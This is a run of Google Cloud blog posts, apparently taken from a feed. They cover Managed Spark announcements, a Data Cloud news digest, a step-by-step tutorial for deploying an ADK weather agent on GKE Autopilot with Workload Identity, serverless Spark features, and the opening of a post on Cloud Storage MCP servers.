To support the diverse architectural needs of today’s modern data teams, we offer the service in two distinct deployment modes: serverless and managed clusters. The serverless deployment mode completely abstracts infrastructure management for ephemeral or ad-hoc jobs, while the managed clusters deployment mode is designed for teams that require fine-grained infrastructure customization, persistent environments, long-running stateful processing, or native integration with custom Compute Engine hardware configurations.

When it comes to managed cluster deployments, we’ve re-imagined the experience from the ground up, focusing on three core pillars: making Spark faster by supercharging execution speeds, easier to run by maximizing resource obtainability and reducing operational overhead, and smarter by embedding AI directly into the development and operational lifecycle.

This blog post focuses specifically on what we announced at Google Cloud Next ‘26 for the Managed Spark clusters deployment mode: providing enhanced flexibility to fine-tune performance and cost through native execution engine, smarter scaling policies, and Gemini-powered extensions. For the latest of the serverless deployment mode, check out this blog.

Faster, with the Lightning Engine native execution engine

Arguably the biggest update for Managed Spark clusters is Lightning Engine, which introduces massive performance gains for Spark DataFrame/Dataset APIs and heavy Spark SQL queries. Powered by a native, C++ vectorized execution engine built on Velox and Gluten, with specialized internal enhancements, Lightning Engine bypasses JVM execution bottlenecks by compiling query plans into native instructions optimized for SIMD (Single Instruction, Multiple Data) vectorization.

This native execution engine delivers:

Up to 4.9x faster performance than standard open-source Spark
up to 2x the price-performance over the leading high-speed Spark alternative

Crucially, taking advantage of these performance gains doesn’t require any code changes to your existing Spark applications. Because your jobs complete faster, you directly reduce your aggregate Compute Engine runtime hours and overall spend.

To enable Lightning Engine on your managed clusters, simply specify the Lightning Engine option when you’re creating a cluster.

Learn technical details and hear Lowe’s experience with Lightning Engine

Easier: Maximize resource obtainability via Flexible VMs

Temporary localized shortages of a specific machine type can stall cluster creation or interrupt autoscaling. To dramatically improve cluster resilience against capacity constraints, Flexible VMs for Managed Spark clusters are now generally available.

Flexible VMs allow you to define up to ten ranked machine types for your master, primary, and secondary worker nodes. Managed Service for Apache Spark pairs this preference with automated regional zone placement, dynamically scanning the entire region to fulfill your capacity requests using the best available hardware layout. This helps ensure your pipelines spin up predictably, drastically reducing resource availability errors, and maximizing your ability to capture cost-effective Spot VM capacity during periods of peak demand.

Easier: Zero-scale clusters and scheduled stops

To give you better fiscal control over persistent and developmental environments, we recently announced the general availability of two highly requested FinOps features: zero-scale clusters and cluster scheduled stops.

Zero-scale clusters: You can now provision environments that use exclusively secondary workers (Spot VMs), enabling the cluster to automatically scale down to absolutely zero worker nodes when no processing is active, leaving only the master node online to preserve metadata.
Cluster scheduled stops: This feature lets you configure automated cluster shutdown policies based on specific idle-time limits or a precise future timestamp.

Because these features are natively integrated, they reduce the operational friction of having to delete and reconstruct your environment, while you can stop paying for idle compute overhead during nights and weekends.

Smarter: Managed Service for Apache Spark MCP Server

To bridge the gap between generative AI and data engineering, we launched the Model Context Protocol (MCP) server for Managed Service for Apache Spark. This open-standard integration allows LLMs and AI assistants to securely and dynamically interact with your Managed Spark clusters using natural language.

By utilizing the MCP server, your AI agents can securely connect to your data platform under existing IAM permissions. This allows agents to perform cluster-based operations, such as creating a cluster, submitting a job, or adjusting an autoscaling policy, directly from your AI application.

Smarter: Accelerating AI with the Data Agent Kit

The Google Cloud Data Agent Kit extension allows data scientists, engineers, and developers to manage their entire data workload lifecycle directly within their preferred development environment. We rolled out native support for this extension on Managed Spark clusters, enabling teams to seamlessly build and deploy specialized Data Agents for code generation and data wrangling.

Developers can choose to use Antigravity 2.0, Google's standalone, agentic development platform or bring these agentic capabilities into their preferred IDE including VS Code, Claude Code, or Codex via the Data Agent Kit extensions and plugins. By pairing this streamlined workflow with the raw processing power of managed clusters, these intelligent agents can securely execute complex workflows directly over petabyte-scale data lakes. Specifically, the Data Agent Kit enables developers to:

Build and orchestrate pipelines: Author multi-node data pipelines and generate comprehensive code documentation using natural language.
Perform real-time debugging: Leverage Gemini Cloud Assist to sift through executor logs, pinpoint root causes of job failures, and recommend actionable fixes.
Easily connect to Spark resources: Instantly attach to serverless Spark runtimes or managed clusters without manual network configuration or local Spark installations.
Streamline Git and CI/CD management: Commit, merge, and deploy code directly from your IDE of choice, triggering automated testing and deployment pipelines without friction.

Smarter: Next-generation Lakehouse

We recently launched Lakehouse, which delivers read/write interoperability between engines like Managed Service for Apache Spark and BigQuery. By leveraging the Lakehouse runtime catalog as a unified, serverless metadata layer, it removes data silos and the need for complex translation layers. This agentic-first approach allows organizations to process open formats directly from Google Cloud Storage, or even query remote AWS datasets using the newly introduced cross-cloud Lakehouse, all while maintaining a single source of truth for security and governance.

For customers utilizing Managed Spark clusters, this integration unlocks several powerful new capabilities. Data teams can now accelerate their most demanding ETL and data science workloads by up to 4.9x using the optimized Lightning Engine.

Next-gen runtimes: Cluster Image 3.0 with Spark 4.1

Keeping pace with the open-source ecosystem, we rolled out Cluster Image 3.0 in preview, built with Apache Spark 4.1 and that features an upgraded default Java runtime, Java 21. Spark 4.1 introduces a set of core open-source capabilities, including real-time mode for structured streaming. This enables your Spark environment to support real-time streaming with continuous, sub-second latency processing.

Get started today

These updates are live and ready to use today in Managed Spark clusters! You can enable these new features directly through the Google Cloud console or via the gcloud CLI.

To spin up a new Managed Cluster and natively unlocking the performance of Lightning Engine, run the following command in your terminal:

code_block: <ListValue: [StructValue([('code', 'gcloud dataproc clusters create my-optimized-cluster \\\r\n --region=us-central1 \\\r\n --image-version=2.3 \\\r\n --engine=lightning \\'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79f653940>)])]>

Alternatively, navigate to the Managed Service for Apache Spark page in the console, click Create cluster, and select ‘Enable Lightning Engine’ under the cluster configuration settings to automatically activate Lightning Engine for your Spark jobs.

We look forward to hearing about the environments you build and run as Managed Service for Apache Spark clusters!

What’s new with Google Data Cloud

Thu, 04 Jun 2026 16:00:00 +0000

June 1 - June 5

Beyond the Query: Powering AI Agents with Bigtable, Firestore & Memorystore
Discover the latest advancements in Google Cloud's NoSQL Database portfolio, including Bigtable, Firestore, and Memorystore. This series is designed for a broad audience: whether you are exploring these databases for the first time or are an existing user looking to leverage the new capabilities announced at Next '26.

Register here to secure your spot!

Cloud Engineer's AI Toolkit Workshops: Solve data-driven challenges with BigQuery, AlloyDB, Gemini and more. Hosted by Google Cloud Labs, this highly technical event is built specifically for Platform Engineers, SREs, and cloud infrastructure teams ready to bridge the gap between AI prototypes and production-grade deployments. Look out for more locations coming soon

Toronto - June 25 (Data Cloud) | RSVP Here
Chicago - June 30 (Data Cloud) | RSVP Here
Start a 10-day Bigtable free trial with a 1 node SSD cluster and up to 500GB of storage capacity. With no credit card required to start, you can easily ingest workloads and manage workloads that require low-latency, high-throughput, and predictable access. Plus, new Google Cloud customers get $300 in free credits on signup.

May 11 - May 15

Managed Service for Apache Airflow has launched a wave of new features, including the general availability of Airflow 3.1, AI-powered agentic troubleshooting, a new managed Airflow MCP Server for custom agent integration, and declarative YAML-based orchestration pipelines—discover all the details in the full blog post.

April 20 - April 24

Google-built ODBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built ODBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for applications to BigQuery and is developed entirely in-house by Google. Download a new driver and connect your application to BigQuery.

April 13 - April 17

We announced we are reintroducing Data Studio to play a significant role in the AI era, expanding from data visualizations and reports to host BigQuery conversational agents and data apps built in Colab notebooks.
We announced BigQuery Graph is now available in preview, offering an easy-to-use, highly scalable graph analytics solution, empowering data professionals to model, analyze and visualize massive-scale relationships in an entirely new way.

April 6 - April 10

We introduced Conversational Analytics for Looker Embedded environments, enabling users to add natural language experiences to their own custom data-driven applications, powered by Gemini.
We expanded Looker’s capabilities for faster ad-hoc analysis, with the introduction of self-service Explores, enabling you to bring your own data to Looker’s semantic layer and gain instant access to insights in a governed data environment.

March 23 - March 27

We showed you how you can scale your reads with Cloud SQL autoscaling read pools. This feature allows you to provision multiple read replicas that are accessible via a single read endpoint and to dynamically adjust your read capability based on real-time application needs.
Our customers are leveraging the full power of Conversational Analytics and Looker to drive major business and technical breakthroughs in the AI era. Companies like Telenor, Pet Circle, Fluent Commerce, Lighthouse Intelligence, Wego, and ROLLER are turning data into insights and actions, grounded by Looker’s semantic layer.

March 16 - March 20

We introduced an enhanced Gemini assistant in BigQuery Studio, transforming the agent from a code assistant into a fully context-aware analytics partner.

February 23 - February 27

We introduced managed and remote MCP support for Google Cloud databases, including AlloyDB, Spanner, Cloud SQL, Bigtable and Firestore, to power the next generation of agents. This announcement extends the ability for AI models to plan, build, and solve complex problems, connecting to the database tools our customers leverage daily as the backbone of their work environment.
We outlined how you can build a conversational agent in BigQuery using the Conversational Analytics API to help you build context-aware agents that can understand natural language, query your BigQuery data, and deliver answers in text, tables, and visual charts.

February 16 - February 20

Our customers are leveraging the full power of Looker to drive major business and technical breakthroughs. Companies like Arrive, Audika, Carousell, Framebridge, GumGum, Intel, Overdose Digital, Ocean Network Express, Subskribe and Promevo are leveraging Looker’s newest AI-driven capabilities, including Conversational Analytics, to transform data to insights and actions, and empower their entire organization with a single source of truth, powered by Looker’s semantic layer.

February 2 - February 6

Join us on March 4 for our webinar, Win Your AI Strategy with Cloud SQL Enterprise Plus, to learn how to power your generative AI workloads with 3x higher performance and 99.99% availability. Register today to discover how to build a scalable, enterprise-grade foundation for your most demanding AI applications.

January 26 - January 30

We introduced Conversational Analytics in BigQuery, which allows users to analyze data using natural language. Conversational Analytics in BigQuery is an intelligent agent that generates, executes and visualizes answers grounded in your business context directly in BigQuery Studio, making data insights for data professionals more conversational.
We outlined how data products have become the foundation for AI agents, providing the context needed to make autonomous agents reliable and trusted for real business use, backed by organized business logic and semantic understanding.
We highlighted how you can supercharge data analytics workflows, and outlined Google Cloud’s AI agent offerings for data engineering, data science, and development tools, so you can integrate agentic workflows in your applications, empower your teams and speed discovery.

January 19 - January 23

We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.
Introducing Google Cloud SQL on MSSQLTips: We are highlighting a new technical guide published on MSSQLTips titled "Introducing Google Cloud SQL." This article serves as an essential resource for SQL Server administrators and developers exploring Google Cloud's fully managed database service. It provides a detailed overview of Cloud SQL capabilities, including high availability, security integration, and the seamless transition of on-premises SQL Server workloads to the cloud, making it an ideal resource for those planning their migration strategy.
We are excited to announce the Public Preview of Microsoft Entra ID (formerly Azure Active Directory) integration with Cloud SQL for SQL Server. Designed to tackle the challenge of identity sprawl in multi-cloud environments, this integration allows organizations to govern database access using their existing Microsoft identity infrastructure. Key benefits include centralized identity management, enhanced security features like Multi-Factor Authentication (MFA), and simplified user administration through direct group mapping. This feature is available for SQL Server 2022 and supports both public and private IP configurations.

January 12 - January 16

Google-built JDBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built JDBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for Java applications to BigQuery and is developed entirely in-house by Google. Download a new driver and connect your Java application to BigQuery.
Troubleshoot Airflow tasks instantly with Gemini Cloud Assist investigations: Cloud Composer just got smarter. We are excited to announce that Gemini Cloud Assist investigations are now available directly within Cloud Composer 3. Instead of manually sifting through raw logs, you can now simply click "Investigate" on a failed Airflow task. Gemini analyzes logs and task metadata to identify failure patterns—such as resource exhaustion or timeouts—and provides actionable recommendations driven by Gemini Cloud Assist to resolve the issue. This integration shifts the debugging experience from manual toil to automated root cause analysis, significantly reducing the time required to restore your pipelines. Learn more about AI-assisted troubleshooting.

Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot

Thu, 04 Jun 2026 07:00:00 +0000

While building AI agents locally using Google’s Agent Development Kit (ADK) is an excellent way to prototype, production-ready agents require a robust, scalable infrastructure. For developers looking to move beyond simple instances and into the world of managed container orchestration, Google Kubernetes Engine (GKE) Autopilot offers the perfect balance of flexibility and ease of use.

In this tutorial, I will walk you through building a technical agent with ADK and deploying it to GKE Autopilot. We will focus on utilizing Gemini on Vertex AI as the core model and ensure highest security standards by implementing Workload Identity for permission management.

Understanding the GKE ADK Architecture

Deploying an ADK agent on GKE Autopilot involves more than just running a container. We leverage GKE's native capabilities to handle scaling and security. Our architecture consists of an ADK-based Python application packaged as a Docker image and stored in Artifact Registry. This container runs as a Deployment on GKE Autopilot, where it communicates securely with Vertex AI using Workload Identity—mapping a Kubernetes Service Account to a Google Cloud IAM Service Account.

To expose the agent to the world, we use the Kubernetes Gateway API, the modern successor to Ingress, which provides a cleaner separation of concerns and native support for Google Cloud Load Balancing.

Prerequisites

Before we begin, ensure you have the following tools and accounts ready:

Python 3.10 or higher.
uv for package management.
Google Cloud SDK (gcloud) installed and configured.
A Google Cloud project with billing enabled.
kubectl command-line tool.
jq for parsing JSON responses.
The following APIs enabled: Kubernetes Engine, Artifact Registry, and Vertex AI.

Step 0: Configuring Google Cloud and Authentication

Before interacting with Google Cloud services, you must authenticate your environment and set the active project. This ensures that both the gcloud CLI and your local Python environment can access Vertex AI.

Login to Google Cloud SDK:
```
gcloud auth login
```
Set your active project:
```
gcloud config set project [PROJECT_ID]
```
Setup Application Default Credentials (ADC): This is crucial for the ADK library to authenticate with Vertex AI during local testing.
```
gcloud auth application-default login
```
Define Environment Variables: To ensure we can easily reuse our configuration in subsequent steps, let's export our project, region, and cluster name as environment variables.
```
export PROJECT_ID=$(gcloud config get-value project)
export REGION=us-central1
export CLUSTER_NAME=adk-cluster
```

Step 1: Provisioning GKE Autopilot

GKE Autopilot is the recommended way to run Kubernetes without managing nodes. It allows you to focus on your agent deployment while Google manages the infrastructure. Starting the cluster creation now allows it to provision in the background while we build the agent.

gcloud container clusters create-auto $CLUSTER_NAME --region $REGION

While the cluster is provisioning, we can move on to building our agent.

Step 2: Building the Agent with ADK

First, let's create our agent. Start by creating a folder for the agent code:

mkdir adk-agent
cd adk-agent

Initialize a new Python project with uv:

uv init

Add dependencies

uv add google-adk

Create a new agent using the adk cli

uv run adk create weather_agent

You will be asked to choose a model for the root agent. Choose gemini-2.5-flash (Number 1). Next you will be asked to choose a backend. Choose Vertex AI (Number 2). Next you will be asked to enter your Google Cloud project ID. Enter your project ID. Next you will be asked to enter your Google Cloud region. Choose a region of your choice. Example: us-central1.

The previous command scaffolded a new directory weather_agent with the following structure:

weather_agent/
├── .env
├── __init__.py
└── agent.py

ADK requires the agent code to be in agent.py file. Let's edit the agent.py file to add a simple tool for the agent.

 from google.adk import Agent
# Define a simple tool for the agent
def get_weather(city: str) -> str:
    """Returns the current weather in a city."""
    return f"The weather in {city} is 90 degrees Fahrenheit and sunny."
# Initialize the agent with Vertex AI and Gemini
root_agent = Agent(
    name="weather_agent",
    model="gemini-2.5-pro",
    tools=[get_weather]
)

The agent.py file is the entry point for the agent. It is used to define the agent and its tools. The get_weather function is a simple tool that returns the current weather in a city. For the purpose of this tutorial, we are using a hardcoded value for the weather. In a real-world scenario, you would use an API to get the current weather.

Step 3: Testing the Agent Locally

Before deploying the agent to GKE Autopilot, we need to test it locally to ensure it works as expected. Run the following command to start the agent in debug mode with the web UI:

uv run adk web

Open http://localhost:8000 in your browser and you should see the ADK web UI. You can then interact with your agent by typing messages in the chat interface.

If the agent returns a message like "The weather in [CITY] is 90 degrees Fahrenheit and sunny." Congratulations! your ADK agent is working. Now you can proceed to the next step.

Step 4: Preparing for GKE Autopilot

The ADK cli has a built-in command to deploy the agent to GKE Autopilot. However the default settings are not suitable for a production environment. For example, the default settings do not use Workload Identity for authentication with Vertex AI and to expose the Web UI via a Load Balancer on port 80.

We will instead manage the lifecycle of the container ourselves. First we need to containerize the agent.

Create a .dockerignore file in the adk-agent directory to prevent your local virtual environment from being copied into the image:

.venv
.adk
__pycache__
*.pyc
.env

Create a Dockerfile for your agent in the adk-agent directory. We will use a multi-stage build to keep the final production image lightweight and secure:

# Stage 1: Build the virtual environment
FROM python:3.10-slim AS builder

# Install uv
COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/

# Set working directory
WORKDIR /app

# Force uv to use the system Python and use copy instead of symlinks
ENV UV_PYTHON_PREFERENCE=only-system
ENV UV_LINK_MODE=copy
ENV UV_COMPILE_BYTECODE=1
ENV UV_PYTHON=/usr/local/bin/python3

# Install dependencies
# We copy only files needed for installation to maximize cache
COPY pyproject.toml uv.lock ./
# Note: We don't use --frozen yet as the host lock file might be slightly out of sync
# but sync will update it in the builder stage.
RUN uv sync --no-install-project --no-dev --no-cache

# Copy the agent code
COPY . .
# Sync the project itself
RUN uv sync --no-dev --no-cache

# Stage 2: Runtime image
FROM python:3.10-slim

WORKDIR /app

# Copy the pre-built environment from the builder
COPY --from=builder /app/.venv /app/.venv
# Copy the application code (including weather_agent folder)
COPY . .

# Add the environment to the PATH
ENV PATH="/app/.venv/bin:$PATH"
ENV PYTHONUNBUFFERED=1

# Run the ADK API server
# We point to the weather_agent folder
CMD ["adk", "api_server", ".", "--host", "0.0.0.0", "--port", "8080"]

Build and push the image to Artifact Registry:

# Create repository
gcloud artifacts repositories create adk-repo --repository-format=docker --location=$REGION

# Build and push
gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest

Step 5: Implementing Workload Identity for Security

Security is paramount. Instead of hardcoding API keys, we use Workload Identity to grant the GKE pod permission to access Vertex AI.

1. Create an IAM Service Account:

gcloud iam service-accounts create adk-gke-sa

2. Grant Vertex AI permissions:

gcloud projects add-iam-policy-binding $PROJECT_ID \

    --member="serviceAccount:adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/aiplatform.user"

3. Allow the Kubernetes Service Account to impersonate the IAM SA:

gcloud iam service-accounts add-iam-policy-binding adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com \
    --role="roles/iam.workloadIdentityUser" \
    --member="serviceAccount:$PROJECT_ID.svc.id.goog[default/adk-ksa]"

Step 6: Deploying the Agent to GKE

Now, we define the Kubernetes resources. Create a deployment.yaml that includes the Service Account annotation for Workload Identity. Replace $PROJECT_ID and $REGION with your actual project ID and region.

apiVersion: v1
kind: ServiceAccount
metadata:
  name: adk-ksa
  annotations:
    iam.gke.io/gcp-service-account: adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: adk-agent
spec:
  replicas: 2
  selector:
    matchLabels:
      app: adk-agent
  template:
    metadata:
      labels:
        app: adk-agent
    spec:
      serviceAccountName: adk-ksa
      containers:
      - name: adk-agent
        image: $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest
        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits: 
            cpu: "1"
            memory: "1Gi"
        ports:
        - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: adk-service
spec:
  selector:
    app: adk-agent
  ports:
  - port: 80
    targetPort: 8080

Apply the configuration:

kubectl apply -f deployment.yaml

Check the status of the deployment:

kubectl get pods -w

Once the pods are running, you can use kubectl port-forward to access the agent locally:

kubectl port-forward svc/adk-service 8080:80

Since we deployed the agent without Web UI, we can't access it at http://localhost:8080. However, we can still interact with it using the API and curl.

In a new terminal, run the following commands:

# Create a new session
curl -X POST http://localhost:8080/apps/weather_agent/users/u_123/sessions/s_123

# Run a message
curl -s -X POST http://localhost:8080/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_123",
"sessionId": "s_123",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .

The curl command will return the response in JSON format. The jq command is used to parse the JSON response and display it in a more readable format. . You should see a response like:

{
    "sessionId": "s_123",
    "messages": [
        {
            "role": "assistant",
            "parts": [
                {
                    "text": "The weather in New York today is sunny with a high of 90 degrees Fahrenheit."
                }
            ]
        }
    ]
}

(Optional) Step 7: Exposing via Gateway API and HTTPS load balancer

Finally, we expose the agent using the GKE Gateway API with a Google-managed TLS certificate. This is the recommended, production-grade approach — Google will automatically provision and renew the certificate for your domain.

NB: GKE supports other options to provision certificates. You can use Let's Encrypt with cert-manager, pre-shared certificates, or any other certificate authority. You can check the GKE documentation for more details.

First, reserve a static IP address for your load balancer:

gcloud compute addresses create adk-agent-ip --global
export AGENT_IP=$(gcloud compute addresses describe adk-agent-ip --global --format="value(address)")
echo "Your IP: $AGENT_IP"

Point your domain's DNS A record at $AGENT_IP. Example: adk.mydomain.com

Create a Google-Managed Certificate. Replace adk.yourdomain.com with your actual domain::

gcloud compute ssl-certificates create adk-cert --domains adk.yourdomain.com --global

Create a gateway.yaml with the following content:

# Gateway: HTTPS load balancer with the managed certificate and static IP
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: adk-gateway
spec:
  gatewayClassName: gke-l7-global-external-managed
  listeners:
  - name: https
    protocol: HTTPS
    port: 443
    tls:
      mode: Terminate
      options:
        networking.gke.io/pre-shared-certs: adk-cert
  addresses:
  - type: NamedAddress
    value: adk-agent-ip
---
# HTTPRoute: forward traffic to the ADK service
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: adk-route
spec:
  parentRefs:
  - name: adk-gateway
  hostnames:
  - "api.yourdomain.com"
  rules:
  - backendRefs:
    - name: adk-service
      port: 80
---
apiVersion: networking.gke.io/v1
kind: HealthCheckPolicy
metadata:
  name: adk-health
  namespace: default
spec:
  default:
    checkIntervalSec: 15
    timeoutSec: 5
    healthyThreshold: 1
    unhealthyThreshold: 2
    logConfig:
      enabled: false
    config:
      type: HTTP
      httpHealthCheck:
        port: 8080
        requestPath: /health
  targetRef:
    group: ""
    kind: Service
    name: adk-service

Apply the configuration:

kubectl apply -f gateway.yaml

Certificate provisioning can take up to 20 minutes. Monitor the status with:

gcloud compute ssl-certificates describe adk-cert --global

Once the status shows Active, your agent is live at https://api.yourdomain.com. You can test it with:

# Create a new session
curl -X POST https://api.yourdomain.com/apps/weather_agent/users/u_124/sessions/s_124

# Run a message
curl -s -X POST https://api.yourdomain.com/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_124",
"sessionId": "s_124",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .

Conclusion & Looking Ahead

By following these steps, you have successfully deployed a production-ready AI agent built with ADK onto GKE Autopilot that invokes Gemini on Vertex AI with Workload Identity for authentication. This setup ensures that your agent can scale horizontally to meet demand while maintaining a high security posture.

As you look ahead, consider integrating more complex tools or leveraging GKE's multi-cluster capabilities for even greater resilience. For more details on the technologies used here, explore the official GKE documentation and the ADK repository.

To avoid ongoing charges, remember to delete the GKE cluster and the Artifact Registry repository when finished:

kubectl delete -f gateway.yaml
kubectl delete -f deployment.yaml
gcloud compute addresses delete adk-agent-ip --global
gcloud compute ssl-certificates delete adk-cert --global
gcloud container clusters delete $CLUSTER_NAME --region $REGION
gcloud artifacts repositories delete adk-repo --location $REGION

What’s new in serverless Managed Service for Apache Spark

Wed, 03 Jun 2026 16:00:00 +0000

Whether you use it for data preparation, real-time interactive queries, AI model training, or something entirely different, running Apache Spark at scale is demanding — you shouldn’t have to manage the underlying infrastructure too.

Late last year, we announced the general availability (GA) of our serverless Managed Service for Apache Spark runtime version 3.0, prioritizing speed, simplicity, and reliability. Since then, customer use of Managed Service for Apache Spark for data science has nearly doubled year over year. This is a testament to our belief that using Google Cloud is the easier, smarter, and faster place to run your Apache Spark workloads.

In this blog, let’s dive into a few key features that make our serverless Apache Spark offering a great fit for a wide range of workflows, including feature engineering, GPU-accelerated model training and tuning, semantic search, RAG, building AI agents and applications, and more.

Zero-setup onboarding

The most significant barrier to entry for a cloud service is often the "time to magic moment" — the interval between creating a project and running your first workload. Previously, with serverless Spark, you still needed to manually configure IAM roles, VPC networking, and firewall rules before submitting a single job.

In the serverless Spark 3.0 runtime version, zero-setup onboarding significantly reduces the time to launch your first workload on serverless Spark. It does so by automating the following steps:

Permissions: Necessary IAM roles and permissions are automatically provisioned to the appropriate service accounts.
Networking: Private Google Access is auto-enabled on subnets, and system firewall policies are configured automatically.
API management: Enabling APIs is now more efficient; you can just enable the Managed Service for Apache Spark API instead of manually having to enable several different APIs, as you did previously.

Fast startup for SLA-sensitive workloads

Latency matters, especially for interactive data science and SLA-sensitive batch pipelines. Historically, serverless Spark startup times could take several minutes. With the 3.0 runtime, we’ve dropped startup times by 75% across both standard and premium tiers, delivered automatically without any code or configuration changes and at no additional cost.

This massive improvement qualifies serverless Spark for a much broader range of SLA-sensitive workloads, and we’re always looking to optimize startup times even further.

"Serverless Spark allowed us to quickly reap benefits by removing the need for fine-grain machine management. This drove faster model development and significantly reduced our data processing costs." - César Narnajo, Principal Engineer, Moloco

Better GPU obtainability

Support for Dynamic Workload Scheduler (DWS) Flex Start Mode in the serverless 3.0 runtime version allows serverless Spark to queue customer requests for a configurable duration when GPUs are unavailable. This feature addresses the obtainability challenges for high-demand accelerators like NVIDIA A100 and L4 that are the subject of frequent regional shortages. By pausing workloads until the necessary GPU capacity becomes accessible with DWS, you can dramatically increase obtainability and reliability for your latency-sensitive AI/ML workloads.

First-class support for Apache Spark 4.x

The serverless Spark 3.0 runtime version supports current and upcoming Apache Spark 4.x innovations, including Spark Connect, which supports a decoupled client-server architecture that enables remote connectivity from any client.

Enhanced multi-zonal support

To protect global enterprise workloads from zonal outages or hardware stockouts, the serverless Spark 3.0 runtime introduces enhanced multi-zonal support by default. The service can now automatically allocate execution nodes across multiple zones within a single region to help ensure obtainability.

Crucially, we do not charge for cross-zonal network traffic between nodes in a region, providing high availability without the traditional multi-zone tax. This is another benefit that you can realize by bringing your global Apache Spark workloads to Google Cloud.

Looking ahead

In addition to the above, we’re also continuing to innovate and push the boundaries of ease of use in areas such as history-based autotuning and goal based autoscaling.

Get started today

You can take advantage of these features today by specifying runtime_version: 3.0 in your batch workloads or interactive sessions. To run your first workload on serverless Spark, perform the following simple steps:

Enable the Managed Service for Apache Spark API.
If you aren’t the project owner, ask your project admin for the serverless Managed Service for Apache Spark Editor (roles/dataproc.serverlessEditor) role on the project.

Now you’re ready to start running your workloads on the Serverless 3.0 runtime version. For more details, visit our updated documentation and access serverless Managed Service for Apache Spark in the Google Cloud console.

Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers

Tue, 02 Jun 2026 17:00:00 +0000

Google Cloud Storage (GCS) is a foundational component of the modern agentic tech stack and the preferred home for unstructured data at scale. As enterprises deploy agents in production, the critical focus has shifted to turning data into context and building secure, standardized integrations to access context. This is the core of smart storage: making unstructured data inherently agent-ready by turning passive objects into rich context for reasoning. Whether it’s automating complex financial workflows or diagnosing system failures in seconds, AI success now depends on how seamlessly agents can leverage this intelligence to make smart, high-stakes decisions.

In this blog, we will share three examples of agents built by customers using GCS, and then share how you can securely and reliably connect your agents to GCS using Model Context Protocol (MCP). Combined with smart storage features like auto annotations and object contexts, GCS MCP server makes the whole agent deployment process easy and simple.

Real-world agent success on Google Cloud Storage

We are seeing incredible innovation from customers leveraging MCP and Google’s agentic tech stack to solve complex business problems:

Palo Alto Networks built the Strata Co-Pilot agent, a screen-aware AI assistant that guides network security administrators through complex configuration flows—either by highlighting steps or executing them directly. The agent is powered by the Gemini Live API, with GCS serving as its “historical memory” connected via the GCS MCP server.
Airwallex developed an AI Assistant that understands user context, answers questions, and executes workflows on their behalf. For example, it can smartly analyze expense policy documents and generate detailed approval workflows - a task that would normally take hours to do manually. GCS and GCS metadata are used by the agent to store documents and the extracted information, respectively.

Snap's Job Optimization Agent analyzes Flink and Spark job specs, metadata, and historical metrics stored on GCS across thousands of jobs to find optimization opportunities, generate cost estimates, and tune configurations. Using this agent, Snap is already seeing investigation time reduced from 30 minutes to 30 seconds!

In all these three agents, the GCS MCP server handles data operations as well as enforces standard RBAC and access policies.

Connecting agents to GCS using MCP

MCP has rapidly emerged as the universal standard for connecting agents to data sources, but building custom servers from scratch is often a slow, distracting process that diverts focus from innovation. This path introduces significant development overhead and risk, as it forces you to manage everything from authentication and error handling to keeping pace with GCS’s evolving capabilities. To solve this, GCS offers two powerful MCP server options — Remote and Local — allowing you to offload the foundational plumbing and focus on creating value.

1. Remote MCP server: Fully-managed
Connecting your agents to the Cloud Storage MCP server requires zero infrastructure deployment. By simply pointing your agent configuration to the managed endpoint, you gain immediate access to your unstructured data on GCS, allowing you to scale your agentic workloads effortlessly without the burden of operational overhead.

Because the Cloud Storage MCP server follows the open MCP standard, it works seamlessly with major agentic frameworks like ADK and is compatible with MCP clients. You can easily connect clients like Google Antigravity and Anthropic’s Claude by adding a Custom Connector in the settings. Simply point it to your Cloud Storage MCP endpoint, and you are ready to start building — no complex configuration files required.

Connecting an agent to storage requires robust security and governance. GCS MCP server is built on Google Cloud's standard identity, observability, and security frameworks:

Identity-first security: Authentication is handled entirely through Identity and Access Management (IAM) rather than shared keys. This ensures agents can only access data (buckets and objects) explicitly authorized by the user.
Full observability: To track agent activity, every request and action taken via these MCP servers is logged in Cloud Audit Logs. This provides security teams with a record of every interaction, maintaining visibility alongside ease of access.
MCP security - content scanning: You can optionally configure the MCP endpoint with Google’s content security service, Google Cloud Model Armor. This allows you to implement security controls against common MCP attack vectors—such as direct and indirect prompt injection attacks, MCP Tool poisoning attacks, and malicious URL/SQL injections—as well as prevent the leakage of sensitive data.

Cloud Storage MCP servers are perfect for most production use cases; however, as with all remote servers, you lose the capability to fully customize your MCP tools.

2. Local MCP Server: Self-managed for controlled customization
While the Remote server handles standard data access, Local MCP is the right choice when you need to build custom tools specific to your business logic. For example, if your agent needs to perform specialized data transformations—such as redacting PII or adding context from another internal system—whenever it reads a file from GCS, a Local MCP server allows you to define those unique capabilities

